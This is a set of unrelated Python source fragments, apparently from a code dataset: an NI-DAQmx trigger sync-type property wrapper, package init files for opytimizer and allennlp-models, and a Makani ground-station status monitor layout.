with cfunc.arglock:
if cfunc.argtypes is None:
cfunc.argtypes = [
lib_importer.task_handle, ctypes.POINTER(ctypes.c_int)]
error_code = cfunc(
self._handle, ctypes.byref(val))
check_for_error(error_code)
return SyncType(val.value)
@sync_type.setter
def sync_type(self, val):
val = val.value
cfunc = lib_importer.windll.DAQmxSetTriggerSyncType
if cfunc.argtypes is None:
with cfunc.arglock:
if cfunc.argtypes is None:
cfunc.argtypes = [
lib_importer.task_handle, ctypes.c_int]
error_code = cfunc(
self._handle, val)
check_for_error(error_code)
@sync_type.deleter
def sync_type(self):
cfunc = lib_importer.windll.DAQmxResetTriggerSyncType
if cfunc.argtypes is None:
with cfunc.arglock:
if cfunc.argtypes is None:
cfunc.argtypes = [
lib_importer.task_handle]
error_code = cfunc(
self._handle)
check_for_error(error_code)
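    # Usage sketch (requires the NI-DAQmx runtime and a device; names are
    # illustrative):
    #
    #     import nidaqmx
    #     from nidaqmx.constants import SyncType
    #
    #     with nidaqmx.Task() as task:
    #         task.ai_channels.add_ai_voltage_chan("Dev1/ai0")
    #         task.triggers.sync_type = SyncType.MASTER
    #         task.triggers.start_trigger.cfg_dig_edge_start_trig("/Dev1/PFI0")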
|
opytimizer/optimizers/misc/__init__.py | anukaal/opytimizer | 528 | 12719338 | """A miscellaneous package for all common opytimizer modules.
It contains implementations of miscellaneous-based optimizers.
"""
from opytimizer.optimizers.misc.aoa import AOA
from opytimizer.optimizers.misc.cem import CEM
from opytimizer.optimizers.misc.doa import DOA
from opytimizer.optimizers.misc.gs import GS
from opytimizer.optimizers.misc.hc import HC
|
allennlp_models/lm/util/beam_search_generators/__init__.py | shunk031/allennlp-models | 402 | 12719344 | from .beam_search_generator import BeamSearchGenerator
from .transformer_beam_search_generator import TransformerBeamSearchGenerator
|
gs/monitor2/apps/plugins/layouts/status_layout.py | leozz37/makani | 1,178 | 12719355 | # Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Layout to monitor motors."""
from makani.gs.monitor2.apps.layout import base
from makani.gs.monitor2.apps.plugins import common
from makani.gs.monitor2.apps.plugins.indicators import node_status
_WING_TMS570_NODES = common.WingTms570Nodes()
class StatusLayout(base.BaseLayout):
"""Layout to monitor motors."""
_NAME = 'Status'
_DESIRED_VIEW_COLS = 12
def Initialize(self):
self._AddIndicators('Network', [
node_status.TetherNodeNetworkIndicator(
node_name, node_name,
node_name not in common.NETWORK_STATUS_NODES_TO_EXCLUDE)
for node_name in _WING_TMS570_NODES
], {'cols': 3})
self._AddIndicators('Failures', [
node_status.TetherNodeFailureIndicator(node_name, node_name)
for node_name in _WING_TMS570_NODES
], {'cols': 2})
self._AddIndicators('Power', [
node_status.TetherNodePowerIndicator(node_name, node_name)
for node_name in _WING_TMS570_NODES
], {'cols': 2})
self._AddIndicators('Temperature [C]', [
node_status.TetherNodeTempIndicator(node_name, node_name)
for node_name in _WING_TMS570_NODES
], {'cols': 2})
self._AddIndicators('Humidity', [
node_status.TetherNodeHumidityIndicator(node_name, node_name)
for node_name in _WING_TMS570_NODES
], {'cols': 2})
|